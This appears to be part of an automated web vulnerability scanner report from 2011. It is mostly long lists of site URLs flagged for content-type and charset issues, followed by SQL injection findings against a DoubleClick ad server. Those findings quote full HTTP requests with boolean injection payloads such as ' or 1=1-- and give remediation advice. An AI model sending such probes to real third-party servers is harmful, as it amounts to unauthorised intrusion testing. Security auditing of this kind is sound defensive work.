29.147. http://www.rv-clubs.us/favicon.ico

29.148. http://www.satellitesales.com/favicon.ico

29.149. http://www.secretmomsvideos.com/favicon.ico

29.150. http://www.sekindo.com/favicon.ico

29.151. http://www.servpro.com/favicon.ico

29.152. http://www.sheezyart.com/favicon.ico

29.153. http://www.sister-seduction.net/favicon.ico

29.154. http://www.slipstick.com/favicon.ico

29.155. http://www.squirt-disgrace.net/favicon.ico

29.156. http://www.srv17.com/favicon.ico

29.157. http://www.sugarslam.com/favicon.ico

29.158. http://www.surnamesite.com/favicon.ico

29.159. http://www.surveysuperrewards.com/favicon.ico

29.160. http://www.tatravelcenters.com/favicon.ico

29.161. http://www.teriskitchen.com/favicon.ico

29.162. http://www.theoldschoolhousestore.com/favicon.ico

29.163. http://www.timescommunity.com/favicon.ico

29.164. http://www.toonshere.com/favicon.ico

29.165. http://www.toviaz.com/favicon.ico

29.166. http://www.tradearca.com/favicon.ico

29.167. http://www.travisa.com/favicon.ico

29.168. http://www.triadfinancial.com/favicon.ico

29.169. http://www.tubegoggles.com/favicon.ico

29.170. http://www.tubewifes.com/favicon.ico

29.171. http://www.tulalipcasino.com/favicon.ico

29.172. http://www.uacareertrack.com/favicon.ico

29.173. http://www.unclaimed.com/favicon.ico

29.174. http://www.upskirtcollection.net/favicon.ico

29.175. http://www.uscareerinstitute.edu/favicon.ico

29.176. http://www.vampirediaries.com/favicon.ico

29.177. http://www.vindictuswiki.com/favicon.ico

29.178. http://www.vivalagames.com/favicon.ico

29.179. http://www.voltairenet.org/favicon.ico

29.180. http://www.wavy10.com/favicon.ico

29.181. http://www.wdasfm.com/favicon.ico

29.182. http://www.webfeedreader.com/favicon.ico

29.183. http://www.westathome.com/favicon.ico

29.184. http://www.wildmatures.org/favicon.ico

29.185. http://www.willistonherald.com/favicon.ico

29.186. http://www.willyouhost.com/favicon.ico

29.187. http://www.wrestlewithjimmy.net/favicon.ico

29.188. http://www.wtma.com/favicon.ico

29.189. http://www.wyyo.com/favicon.ico

29.190. http://www.xcomment.com/favicon.ico

29.191. http://www.xratedbodybuilders.com/favicon.ico

29.192. http://www.youngerbunnies.com/favicon.ico

29.193. http://www.zegeridotc.com/favicon.ico

30. HTML uses unrecognised charset

30.1. http://www.aquascapeonline.com/favicon.ico

30.2. http://www.callsource.com/favicon.ico

30.3. http://www.hannspree.com/favicon.ico

30.4. http://www.jared-diamonds.com/favicon.ico

30.5. http://www.manga32.com/favicon.ico

30.6. http://www.mbn.com.ua/favicon.ico

30.7. http://www.qianlong.com/favicon.ico

30.8. http://www.save2pc.com/favicon.ico

31. Content type incorrectly stated

31.1. http://ads.pointroll.com/PortalServe/

31.2. http://afe.specificclick.net/

31.3. http://ar.voicefive.com/b/rc.pli

31.4. http://www.1280.com/favicon.ico

31.5. http://www.150fast.com/favicon.ico

31.6. http://www.1sky.org/favicon.ico

31.7. http://www.321gold.com/favicon.ico

31.8. http://www.3d3.com/favicon.ico

31.9. http://www.3reef.com/favicon.ico

31.10. http://www.4m.net/favicon.ico

31.11. http://www.670kboi.com/favicon.ico

31.12. http://www.6ass9.com/favicon.ico

31.13. http://www.977music.com/favicon.ico

31.14. http://www.about-salmonella.com/favicon.ico

31.15. http://www.aionarmory.com/favicon.ico

31.16. http://www.airgunsofarizona.com/favicon.ico

31.17. http://www.ajdesigner.com/favicon.ico

31.18. http://www.allaboutdrawings.com/favicon.ico

31.19. http://www.allegiance.com/favicon.ico

31.20. http://www.allgame.com/favicon.ico

31.21. http://www.amasci.com/favicon.ico

31.22. http://www.americanmedical-id.com/favicon.ico

31.23. http://www.antiqueradio.org/favicon.ico

31.24. http://www.arnottindustries.com/favicon.ico

31.25. http://www.asianmovielola.com/favicon.ico

31.26. http://www.auntbugs.com/favicon.ico

31.27. http://www.autozonepro.com/favicon.ico

31.28. http://www.avidpromedical.com/favicon.ico

31.29. http://www.bankserv.com/favicon.ico

31.30. http://www.bcpl.info/favicon.ico

31.31. http://www.best-running-tips.com/favicon.ico

31.32. http://www.bigagnes.com/favicon.ico

31.33. http://www.bigorrin.org/favicon.ico

31.34. http://www.blackgold.org/favicon.ico

31.35. http://www.blogxilla.com/favicon.ico

31.36. http://www.bloxnine.com/favicon.ico

31.37. http://www.booksshouldbefree.com/favicon.ico

31.38. http://www.breastfeeding.com/favicon.ico

31.39. http://www.broadbandsports.com/favicon.ico

31.40. http://www.brunswick.com/favicon.ico

31.41. http://www.cabinsusa.com/favicon.ico

31.42. http://www.careersandcolleges.com/favicon.ico

31.43. http://www.carsondellosa.com/favicon.ico

31.44. http://www.cash-advances-in-1-hour.com/favicon.ico

31.45. http://www.cashstore.com/favicon.ico

31.46. http://www.cayenne.com/favicon.ico

31.47. http://www.ccnow.com/favicon.ico

31.48. http://www.churchleaderinsights.com/favicon.ico

31.49. http://www.cirruscasino.net/favicon.ico

31.50. http://www.cityofheroes.com/favicon.ico

31.51. http://www.classicwordgames.com/favicon.ico

31.52. http://www.clevelandcountyschools.org/favicon.ico

31.53. http://www.clevelandgolf.com/favicon.ico

31.54. http://www.collegeotr.com/favicon.ico

31.55. http://www.coloring-page.com/favicon.ico

31.56. http://www.coloringcastle.com/favicon.ico

31.57. http://www.comfortmarket.com/favicon.ico

31.58. http://www.corestandards.org/favicon.ico

31.59. http://www.costcentral.com/favicon.ico

31.60. http://www.craigslist.at/favicon.ico

31.61. http://www.crowleymarine.com/favicon.ico

31.62. http://www.cyberfinder.com/favicon.ico

31.63. http://www.danomatic.com/favicon.ico

31.64. http://www.darkecountyfair.com/favicon.ico

31.65. http://www.davison.com/favicon.ico

31.66. http://www.deanza.edu/favicon.ico

31.67. http://www.dezignwithaz.com/favicon.ico

31.68. http://www.diesel.com/favicon.ico

31.69. http://www.diethealthclub.com/favicon.ico

31.70. http://www.direct.tv/favicon.ico

31.71. http://www.directboats.com/favicon.ico

31.72. http://www.dispatchinteractive.com/favicon.ico

31.73. http://www.downy.com/favicon.ico

31.74. http://www.dulcolaxusa.com/favicon.ico

31.75. http://www.dyessworldwide.com/favicon.ico

31.76. http://www.eaglesband.com/favicon.ico

31.77. http://www.educatedonline.net/favicon.ico

31.78. http://www.esa.int/favicon.ico

31.79. http://www.eslteachersboard.com/favicon.ico

31.80. http://www.everestcollege.edu/favicon.ico

31.81. http://www.expedient.com/favicon.ico

31.82. http://www.expertsatellite.com/favicon.ico

31.83. http://www.extremeoverclocking.com/favicon.ico

31.84. http://www.extremeskins.com/favicon.ico

31.85. http://www.facebook.com/extern/login_status.php

31.86. http://www.fantasiaofficial.com/favicon.ico

31.87. http://www.fastbooking.com/favicon.ico

31.88. http://www.fcbarcelona.cat/favicon.ico

31.89. http://www.fightpp.org/favicon.ico

31.90. http://www.findstudentloans.com/favicon.ico

31.91. http://www.flvsoft.com/favicon.ico

31.92. http://www.foofighters.com/favicon.ico

31.93. http://www.forconstructionpros.com/favicon.ico

31.94. http://www.foreclosurelistingsnationwide.com/favicon.ico

31.95. http://www.foundingfathers.info/favicon.ico

31.96. http://www.foxsportskansascity.com/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1

31.97. http://www.foxyhousewives.com/favicon.ico

31.98. http://www.frbsf.org/favicon.ico

31.99. http://www.freeonlinesoftware.info/favicon.ico

31.100. http://www.freevistafiles.com/favicon.ico

31.101. http://www.gasparinutrition.com/favicon.ico

31.102. http://www.gavilan.edu/favicon.ico

31.103. http://www.gecu-ep.org/favicon.ico

31.104. http://www.getmyhomesvalue.com/favicon.ico

31.105. http://www.getrv.com/favicon.ico

31.106. http://www.giftcards.com/favicon.ico

31.107. http://www.glowfoto.com/favicon.ico

31.108. http://www.googleimages.com/favicon.ico

31.109. http://www.greatgardenplants.com/favicon.ico

31.110. http://www.greenway.org/favicon.ico

31.111. http://www.grubhub.com/favicon.ico

31.112. http://www.gruntsmilitary.com/favicon.ico

31.113. http://www.h2onews.org/favicon.ico

31.114. http://www.hamsterwatch.com/favicon.ico

31.115. http://www.have-fun-in-the-southwest.com/favicon.ico

31.116. http://www.healthiertalk.com/favicon.ico

31.117. http://www.healthy-oil-planet.com/favicon.ico

31.118. http://www.helloindianapolis.com/favicon.ico

31.119. http://www.helminc.com/favicon.ico

31.120. http://www.homebasedbusinessmatchingservice.com/favicon.ico

31.121. http://www.homesolutionsnews.us/favicon.ico

31.122. http://www.htmlgoodies.com/favicon.ico

31.123. http://www.hvacagent.com/favicon.ico

31.124. http://www.idg.com.au/favicon.ico

31.125. http://www.ihiremanufacturing.com/favicon.ico

31.126. http://www.ihireretail.com/favicon.ico

31.127. http://www.ihop.org/favicon.ico

31.128. http://www.ihousenet.com/favicon.ico

31.129. http://www.inyork.com/favicon.ico

31.130. http://www.ionchannels.org/favicon.ico

31.131. http://www.ipipeline.com/favicon.ico

31.132. http://www.juicing-for-health.com/favicon.ico

31.133. http://www.kencove.com/favicon.ico

31.134. http://www.khsaa.org/favicon.ico

31.135. http://www.kikkomanusa.com/favicon.ico

31.136. http://www.kinderthemes.com/favicon.ico

31.137. http://www.kjct8.com/favicon.ico

31.138. http://www.knife-depot.com/favicon.ico

31.139. http://www.kuryakyn.com/favicon.ico

31.140. http://www.laptopical.com/favicon.ico

31.141. http://www.lasalle.edu/favicon.ico

31.142. http://www.lasvegasdirect.com/favicon.ico

31.143. http://www.lattc.edu/favicon.ico

31.144. http://www.leeprecision.com/favicon.ico

31.145. http://www.lesboteensblog.com/favicon.ico

31.146. http://www.livingontheedge.org/favicon.ico

31.147. http://www.localhistories.org/favicon.ico

31.148. http://www.luggagepros.com/favicon.ico

31.149. http://www.lumens.com/favicon.ico

31.150. http://www.lyricsfire.com/favicon.ico

31.151. http://www.manchester2002-uk.com/favicon.ico

31.152. http://www.manycam.com/favicon.ico

31.153. http://www.marijuanaseedbanks.com/favicon.ico

31.154. http://www.marinas.com/favicon.ico

31.155. https://www.mavitunasecurity.com/support/checkupdate/

31.156. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php

31.157. http://www.mbn.com.ua/favicon.ico

31.158. http://www.mbon.org/favicon.ico

31.159. http://www.mcc.edu/favicon.ico

31.160. http://www.meettheboss.tv/favicon.ico

31.161. http://www.memoryx.net/favicon.ico

31.162. http://www.mercadolivre.com.br/favicon.ico

31.163. http://www.mirandalambert.com/favicon.ico

31.164. http://www.mitsubishi-tv.com/favicon.ico

31.165. http://www.modernlinefurniture.com/favicon.ico

31.166. http://www.momsbreak.com/favicon.ico

31.167. http://www.mscd.edu/favicon.ico

31.168. http://www.myaddiction.com/favicon.ico

31.169. http://www.myfreedegree.com/favicon.ico

31.170. http://www.myhealthycat.com/favicon.ico

31.171. http://www.myoutofcontrolteen.com/favicon.ico

31.172. http://www.nascigs.com/favicon.ico

31.173. http://www.naturalhealers.com/favicon.ico

31.174. http://www.neaq.org/favicon.ico

31.175. http://www.newjerseyshore.com/favicon.ico

31.176. http://www.nextstat.com/favicon.ico

31.177. http://www.nikonians.org/favicon.ico

31.178. http://www.nin.com/favicon.ico

31.179. http://www.northstarmls.com/favicon.ico

31.180. http://www.oceana.org/favicon.ico

31.181. http://www.osbornewood.com/favicon.ico

31.182. http://www.osneaker.com/favicon.ico

31.183. http://www.parentsask.com/favicon.ico

31.184. http://www.pemonitorhosted.com/favicon.ico

31.185. http://www.photostockplus.com/favicon.ico

31.186. http://www.piworld.com/favicon.ico

31.187. http://www.pixela.co.jp/favicon.ico

31.188. http://www.plattformpartners.com/favicon.ico

31.189. http://www.poetrynation.com/favicon.ico

31.190. http://www.pokeorder.com/favicon.ico

31.191. http://www.popsugar.co.uk/favicon.ico

31.192. http://www.portalprogramas.com/favicon.ico

31.193. http://www.pponline.co.uk/favicon.ico

31.194. http://www.projectguitar.com/favicon.ico

31.195. http://www.purplepug.com/favicon.ico

31.196. http://www.quizasaurus.com/favicon.ico

31.197. http://www.racerxonline.com/favicon.ico

31.198. http://www.rauantiques.com/favicon.ico

31.199. http://www.realemoexposed.com/favicon.ico

31.200. http://www.realitytvcalendar.com/favicon.ico

31.201. http://www.redlandsdailyfacts.com/favicon.ico

31.202. http://www.remanufactured.com/favicon.ico

31.203. http://www.rugdoctor.com/favicon.ico

31.204. http://www.runningwarehouse.com/favicon.ico

31.205. http://www.sa-venues.com/favicon.ico

31.206. http://www.satellitesales.com/favicon.ico

31.207. http://www.scrapjazz.com/favicon.ico

31.208. http://www.servpro.com/favicon.ico

31.209. http://www.slipstick.com/favicon.ico

31.210. http://www.snaz75.com/favicon.ico

31.211. http://www.soundspectrum.com/favicon.ico

31.212. http://www.speedysigns.com/favicon.ico

31.213. http://www.sportsinjurybulletin.com/favicon.ico

31.214. http://www.srv17.com/favicon.ico

31.215. http://www.stanleyblackanddecker.com/favicon.ico

31.216. http://www.stepbystepcc.com/favicon.ico

31.217. http://www.stereophile.com/favicon.ico

31.218. http://www.stlbeacon.org/favicon.ico

31.219. http://www.stockingsjerk.com/favicon.ico

31.220. http://www.straight.com/favicon.ico

31.221. http://www.studentscholarshipsearch.com/favicon.ico

31.222. http://www.sub5zero.com/favicon.ico

31.223. http://www.superglossary.com/favicon.ico

31.224. http://www.svideo.com/favicon.ico

31.225. http://www.sztaki.hu/favicon.ico

31.226. http://www.tacori.com/favicon.ico

31.227. http://www.tatravelcenters.com/favicon.ico

31.228. http://www.tbd.com/favicon.ico

31.229. http://www.texasbowhunter.com/favicon.ico

31.230. http://www.theacc.com/favicon.ico

31.231. http://www.thefwa.com/favicon.ico

31.232. http://www.theminiaturespage.com/favicon.ico

31.233. http://www.theroyalforums.com/favicon.ico

31.234. http://www.thetelegram.com/favicon.ico

31.235. http://www.time-to-run.com/favicon.ico

31.236. http://www.tinymixtapes.com/favicon.ico

31.237. http://www.tnol.com/favicon.ico

31.238. http://www.top20cool.com/favicon.ico

31.239. http://www.travisa.com/favicon.ico

31.240. http://www.trulyhuge.com/favicon.ico

31.241. http://www.tsihomephone.com/favicon.ico

31.242. http://www.tulalipcasino.com/favicon.ico

31.243. http://www.uniqlo.com/favicon.ico

31.244. http://www.uniquedaily.com/favicon.ico

31.245. http://www.usa1ink.com/favicon.ico

31.246. http://www.usachurches.org/favicon.ico

31.247. http://www.usafootball.com/favicon.ico

31.248. http://www.usagardener.com/favicon.ico

31.249. http://www.uscareerinstitute.edu/favicon.ico

31.250. http://www.uschess.org/favicon.ico

31.251. http://www.verawang.com/favicon.ico

31.252. http://www.vividracing.com/favicon.ico

31.253. http://www.wate.net/favicon.ico

31.254. http://www.web-stat.net/favicon.ico

31.255. http://www.webreference.com/favicon.ico

31.256. http://www.wehaa-ads.com/favicon.ico

31.257. http://www.wellspan.org/favicon.ico

31.258. http://www.wholesalecostumeclub.com/favicon.ico

31.259. http://www.wildernesscollege.com/favicon.ico

31.260. http://www.windows-vista-update.com/favicon.ico

31.261. http://www.winhelponline.com/favicon.ico

31.262. http://www.woodsmith.com/favicon.ico

31.263. http://www.wowtattoos.com/favicon.ico

31.264. http://www.wtma.com/favicon.ico

31.265. http://www.wyyo.com/favicon.ico

31.266. http://www.x-tremegeek.com/favicon.ico

32. Content type is not specified

32.1. http://ads.bluelithium.com/st

32.2. http://pcm1.map.pulsemgr.com/uds/pc

32.3. http://www.actonsoftware.com/favicon.ico

32.4. http://www.ariens.com/favicon.ico

32.5. http://www.bizsiteservice.com/favicon.ico

32.6. http://www.cariboucoffee.com/favicon.ico

32.7. http://www.clubpogo.com/favicon.ico

32.8. http://www.embark.com/favicon.ico

32.9. http://www.freebeerandhotwings.com/favicon.ico

32.10. http://www.fujifilmusa.com/favicon.ico

32.11. http://www.greentreepayday.com/favicon.ico

32.12. http://www.gsmls.com/favicon.ico

32.13. http://www.healthychildren.org/favicon.ico

32.14. http://www.homeawayrealestate.com/favicon.ico

32.15. http://www.homegauge.com/favicon.ico

32.16. http://www.hrs.com/favicon.ico

32.17. http://www.indygov.org/favicon.ico

32.18. http://www.jjc.edu/favicon.ico

32.19. http://www.mercadoclics.com/favicon.ico

32.20. http://www.myleather.com/favicon.ico

32.21. http://www.narrowad.com/favicon.ico

32.22. http://www.navsea.navy.mil/favicon.ico

32.23. http://www.preloved.co.uk/favicon.ico

32.24. http://www.purolatorautofilters.net/favicon.ico

32.25. http://www.rotohog.com/favicon.ico

32.26. http://www.scusd.edu/favicon.ico

32.27. http://www.skyviewzone.com/favicon.ico

32.28. http://www.smithsfoodanddrug.com/favicon.ico

32.29. http://www.softballsavings.com/favicon.ico

32.30. http://www.sueddeutsche.de/favicon.ico

32.31. http://www.thebar.com/favicon.ico

32.32. http://www.viacom.com/favicon.ico

32.33. http://www.vivareal.us/favicon.ico

32.34. http://www.wrinklebest.com/favicon.ico

33. SSL certificate



1. SQL injection  next
There are 25 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 83970435%20or%201%3d1--%20 and 83970435%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?&183970435%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-devry_bestOf_300.swf";
var gif = "http://s0.2mdn.net/2049738/1-best_of300.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclic
...[SNIP]...

Request 2

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?&183970435%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6068

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 14:48:28 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.swf";
var gif = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.devry.edu";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 12387390'%20or%201%3d1--%20 and 12387390'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?12387390'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:41:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6068

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 14:48:28 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.swf";
var gif = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


